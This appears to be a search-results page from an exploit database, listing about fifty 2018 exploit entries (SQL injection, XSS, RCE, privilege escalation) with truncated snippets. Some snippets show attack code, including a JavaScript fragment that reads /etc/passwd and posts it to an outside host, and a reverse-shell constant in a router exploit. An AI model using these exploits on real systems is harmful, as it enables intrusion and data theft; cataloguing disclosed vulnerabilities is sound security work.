47904 matches found
Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow
/ Here's a snippet of the method. ASSIGNRETURNFAILUREONEXCEPTION isolate, captureslengthobj, Object::ToLengthisolate, captureslengthobj; const int captureslength = PositiveNumberToUint32captureslengthobj; ... if functionalreplace const int argc = hasnamedcaptures ? captureslength + 3 :...
Dell EMC Isilon OneFS - Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Dell EMC Isilon OneFS Multiple Vulnerabilities 1. Advisory Information Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL:...
userSpice 4.3 - Cross-Site Scripting
Application UserSpice PHP user management Vulnerability userSpice alert"1"&csrf=8b1339546d6af1e7536da0a705302e9c&updatebio= Vulnerable code: id?" class="nounderline"id?...
Social Oauth Login PHP - Authentication Bypass
Exploit Title: Social Oauth Login PHP - Authentication Bypass Dork: N/A Date: 2018-02-12 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.codester.com/items/4554/social-oauth-login-php Version: All version Category: Webapps CVE: N/A Description:...
SOA School Management - 'access_login' SQL Injection
Exploit Title: SOA - School Management Software with Integrated Parents/Students Portal & Mobile App - 'accesslogin' SQL Injection Dork: N/A Date: 2018-02-14 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...
GNU binutils 2.26.1 - Integer Overflow (PoC)
Exploit Title: Objdump - Integer Overflow Crash POC Date: 12.02.2018 Exploit Author: r4xis Tested Version: 2.26.1 Vuln Version: \nint mainprintf"HelloWorld!\n"; return 0;" f = open"helloWorld.c", 'w' f.writehello f.close os.system"gcc -c helloWorld.c -o test" file test test: ELF 32-bit LSB...
NAT32 2.2 Build 22284 - Cross-Site Request Forgery
Credits: hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CSRF-CVE-2018-6941.txt + ISR: Apparition Security -- D1rty0tis Vendor: ============= www.nat32.com Product: =========== NAT32 Build 22284 NAT32® is a...
NAT32 2.2 Build 22284 - Remote Command Execution
Credits: hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt + ISR: Apparition Security -- D1rty0tis Vendor: ============= www.nat32.com Product: ================= NAT32 Build 22284 NAT32 is a...
Tenda AC15 Router - Remote Code Execution
!/usr/bin/env python EDB Note Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/ import urllib2 import struct import time import socket from optparse import import SimpleHTTPServer import SocketServer import threading import sys import os import subprocess ARMREVSHELL =...
Flash ActiveX 18.0.0.194 - Code Execution
CVE-2015-5112 Pop up a calculator - Requires Flash ActiveX 18.0.0.194 Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44742.swf...
CloudMe Sync < 1.11.0 - Buffer Overflow
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt + ISR: Apparition Security + SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669...
TypeSetter CMS 5.1 - Cross-Site Request Forgery
Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/ Version: 5.1 CVE : NA Category: Webapp CMS 1...
News Website Script 2.0.4 - 'search' SQL Injection
Exploit Title:News Website Script - SQL Injection Error Based Google Dork: NA Date: 12.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: http://under24usd.com/demo/newstoday/index.php Version: 2.0.4 Tested on: Windows 7 Category: Webapps CVE : N...
Advantech WebAccess 8.3.0 - Remote Code Execution
Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution Discovered by: Nassim Asrir Contact: [email protected] / https://www.linkedin.com/in/nassim-asrir-b73a57122/ CVE: CVE-2018-6911 Tested on: IE11 / Win10 Technical Details: ================== The VBWinExec...
TypeSetter CMS 5.1 - 'Host' Header Injection
Exploit Title: TypeSetter CMS 5.1 Host Header Injection Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/ Version: 5.1 CVE : NA Category: Webapp CMS 1. Descripti...
LogicalDOC Enterprise 7.7.4 - Directory Traversal
LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designed to handle...
Juju-run Agent - Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Juju-run Agent Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on Juju agent systems running the juju-run...
LogicalDOC Enterprise 7.7.4 - User Enumeration
LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designed to handle and share...
LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution
LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designe...
glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class MetasploitModule 'glibc LDAUDIT Arbitrary DSO Load Privilege Escalation', 'Description' = %q...
glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class MetasploitModule "glibc '$ORIGIN' Expansion Privilege Escalation", 'Description' = %q This...
Readymade Video Sharing Script 3.2 - 'search' SQL Injection
Exploit Title: Readymade Video Sharing Script - SQL Injection Error Based Google Dork: NA Date: 10.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ Version: 3.2 Tested on: Windows...
Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection
Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection Dork: N/A Date: 2018-02-10 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/paypal-money-transfer-clone/ Version: 1.0.9 Category: Webapps CVE: N/...
Facebook Clone Script 1.0.5 - Cross-Site Scripting
Facebook Clone Script 1.0.5 - Cross-Site Scripting. CVE-2018-6858. Webapps exploit for PHP platform Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/...
Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting
Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting. CVE-2018-6864. Webapps exploit for PHP platform Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Select Your College Script 2.0.2 - Authentication Bypass
Select Your College Script 2.0.2 - Authentication Bypass. CVE-2018-6863. Webapps exploit for PHP platform Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software...
Bitcoin MLM Software 1.0.2 - Cross-Site Scripting
Bitcoin MLM Software 1.0.2 - Cross-Site Scripting. CVE-2018-6862. Webapps exploit for PHP platform Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/ Category:...
JBoss 4.2.x/4.3.x - Information Disclosure
JBoss 4.2.x/4.3.x - Information Disclosure. CVE-2010-1429. Remote exploit for Multiple platform Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X Date: 02/08/2018 Exploit Author: JameelNabbo Vendor Homepage: http://www.jboss.org Software Link: http://jbossas.jboss.org/downloads...
Lawyer Search Script 1.0.2 - Cross-Site Scripting
Lawyer Search Script 1.0.2 - Cross-Site Scripting. CVE-2018-6861. Webapps exploit for PHP platform Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/lawyer-script/...
Schools Alert Management Script 2.0.2 - Arbitrary File Upload
Schools Alert Management Script 2.0.2 - Arbitrary File Upload. CVE-2018-6860. Webapps exploit for PHP platform Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Naukri Clone Script 3.0.3 - 'indus' SQL Injection
Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection Dork: N/A Date: 2018-02-08 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/ Version: 3.0.3 Category: Webapps CVE: N/A Description: Th...
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure
Vulnerability description CVE-2018-6871 First part LibreOffice supports COM.MICROSOFT.WEBSERVICE function: https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 The function is required to obtain data by URL, usually used as:...
Multi Language Olx Clone Script - Cross-Site Scripting
Exploit Title: Multi Language Olx Clone Script - Stored XSS Date: 08.02.2018 Exploit Author: Varun Bagaria Web: Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/olx-clone/ Category: Web Application Version:2.0.6 Tested on: Windows 7 CVE: NA...
macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'
/ AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. Here's the userclient's registerNotificationPort method: text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPortipcport , unsigned int,...
Naukri Clone Script - Persistent Cross-Site Scripting
Naukri Clone Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Naukri Clone Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vendor Homepage:...
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting. CVE-2018-6655. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS. Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web:...
Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting
Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption
Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory exhaustion The vulnerability is due to an error when the...
Entrepreneur Dating Script 2.0.2 - Authentication Bypass
Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/ Version: 2.0.2 Category: Webapps CVE: N/A...
Online Test Script 2.0.7 - 'cid' SQL Injection
Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/ Version: 2.0.7 Category: Webapps CVE: N/A Description: The...
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE Date: February 6, 2018 Exploit Author: Faisal Tameesh @DreadSystems Company: Depth Security https://depthsecurity.com Version: Adobe Coldfusion 11.0.03.292866 Tested On: Windows 10 Enterprise 10.0.15063 CVE: CVE-2017-3066...
MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation
/ Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date: 03/02/2018 Author: Souhail Hammou Vendor Homepage: https://www.malwarefox.com/ Version: 2.74.0.150 Tested on: Windows 7 32-bit / Windows 10 64-bit CVE: CVE-2018-6606 / include include include BOOL...
Cisco ASA - Crash (PoC)
Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect VPN Agent...
Android - 'getpidcon' Permission Bypass in KeyStore Service
The keystore binder service "android.security.IKeystoreService" allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also...
Marked2 - Local File Disclosure
var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest; xhr.open'POST', extract, true; xhr.onload...
NixCMS 1.0 - 'category_id' SQL Injection
Exploit Title: NixCMS 1.0 - 'categoryid' SQL Ýnjection Dork: N/A Date: 03.02.2018 Vendor: https://www.nixdesign.de Software Link: https://www.nixdesign.de/nix-cms/ Demo: http://www.jamaram.de/ Version: 1.0 Tested on: WiN10X64 Exploit Author: Bora Bozdogan Author WebSite : http://borabozdogan.net....
HPE iLO 4 < 2.53 - Add New Administrator User
!/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP: https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769enus Other...
Joomla! Component jLike 1.0 - Information Leak
"; foreach$l as $u echo "- ID\n\n\n\n:\n" .$u'id'.""; echo "- Name\n\n:\n" .$u'name'.""; echo "- Email\n:\n" .$u'email'.""; echo ""; echo "-----------------------------"; elseecho "- No user"; ?...
Joomla! Component JSP Tickets 1.1 - SQL Injection
Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection Dork: N/A Date: 04.02.2018 Vendor Homepage: http://joomlaserviceprovider.com/ Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/ Version: 1.1 Category: Webapps Tested on:...